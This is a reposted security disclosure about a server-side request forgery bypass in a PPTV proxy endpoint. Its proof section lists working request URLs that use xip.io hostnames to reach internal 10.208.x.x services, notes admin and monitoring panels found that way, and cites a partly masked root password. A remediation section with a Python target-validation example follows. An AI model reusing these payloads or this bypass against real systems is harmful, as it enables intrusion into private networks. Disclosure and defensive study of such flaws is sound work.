
SSRF in a PPTV endpoint allows probing the internal network

2015-05-10 03:20

Brief description:

SSRF in a PPTV endpoint allows probing the internal network

Details:

WooYun: A PPTV proxy can be used to probe the pptv internal network
The fix for that vulnerability is incomplete and can be bypassed, exposing internal HTTP services and sensitive information. Reference: WooYun: Most SSRF vulnerabilities marked as fixed on WooYun can be bypassed

Proof of vulnerability:

Code area:

http://client.pptv.com/v3/proxy?s=http://10.208.4.23.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.20.35.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.30.41.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://sso-cas.pplive.cn/cas/login?service=
http://client.pptv.com/v3/proxy?s=http://10.208.188.47.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.250.50.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.10.53.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  zabbix
http://client.pptv.com/v3/proxy?s=http://10.208.169.56.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.188.60.xip.io/sys_login.jsp?url=?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.101.72.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.188.74.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.188.76.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.189.95.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.189.100.xip.io//user/login?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.101.102.xip.io/allocateDB.php?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.20.105.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.187.116.xip.io/admin/?http://zt.pptv.com/clientzt/sports/ice/index.html  PPTV Shipyard  Please log in with your domain username and password
http://client.pptv.com/v3/proxy?s=http://10.208.168.147.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Ops Tools Team Protal
http://client.pptv.com/v3/proxy?s=http://10.208.10.167.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Foreman
http://client.pptv.com/v3/proxy?s=http://10.208.168.171.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  PPTV Subtitle Management System
http://client.pptv.com/v3/proxy?s=http://10.208.168.171.xip.io//subtitle/index?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.189.204.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Log Server
http://client.pptv.com/v3/proxy?s=http://10.208.187.228.xip.io/top10?http://zt.pptv.com/clientzt/sports/ice/index.html  Django
http://client.pptv.com/v3/proxy?s=http://10.208.189.228.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Django
http://client.pptv.com/v3/proxy?s=http://10.208.10.232.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Encoding

Unauthenticated access to a backend:

Through directory listing, a small amount of sensitive information can be obtained, for example the default root password. pw=zMjs****_cd_pp**

Remediation:

Strictly restrict the targets the proxy is allowed to fetch.
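As an added example (not part of the original report or of PPTV's code), a Python check for the s= parameter that implements this recommendation: the host must be on an allowlist and every address it resolves to must be public, so a hostname-only filter's blind spot (an xip.io name that resolves into 10.0.0.0/8) is closed. The allowlist, the sample public address 93.184.216.34 and the fake DNS table are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist: the only origin the proxy is meant to fetch from.
ALLOWED_HOSTS = {"zt.pptv.com"}

def system_resolver(host):
    """Every address the OS resolver returns for host (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_address(addr):
    """True only for globally routable unicast; 10/8, 127/8, 169.254/16,
    172.16/12, 192.168/16, 100.64/10 and multicast all return False."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast

def check_proxy_target(url, allowed_hosts=ALLOWED_HOSTS, resolver=system_resolver):
    """Return (allowed, reason) for a candidate s= value.
    The host comes from the parsed URL, not a substring search, so a
    '?http://zt.pptv.com/...' query string cannot make the target look
    trusted. Each resolved address is then checked, which a hostname-only
    filter misses: 10.208.4.23.xip.io has no literal IP field but resolves
    to 10.208.4.23. The fetch must connect to the checked address rather
    than re-resolve, or a rebinding DNS name defeats the check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host not in allowed_hosts:
        return False, "host not on allowlist"
    try:
        addrs = resolver(host)
    except (OSError, KeyError):
        addrs = set()
    if not addrs:
        return False, "resolution failed"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"resolves to internal address {addr}"
    return True, "ok"

# Constructed DNS answers so the example runs offline (93.184.216.34 is a sample).
FAKE_DNS = {"zt.pptv.com": {"93.184.216.34"}, "10.208.4.23.xip.io": {"10.208.4.23"}}

def fake_resolver(host):
    """Offline stand-in for system_resolver, answering only from FAKE_DNS."""
    return FAKE_DNS[host]
```

With fake_resolver, the legitimate target is accepted while the first URL from the proof above is refused on the allowlist, and refused again on the resolved address even if its host were allowlisted.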

Reposted from: lijiejie@WooYun


Source: www.secbox.cn/hacker/web/3352.html
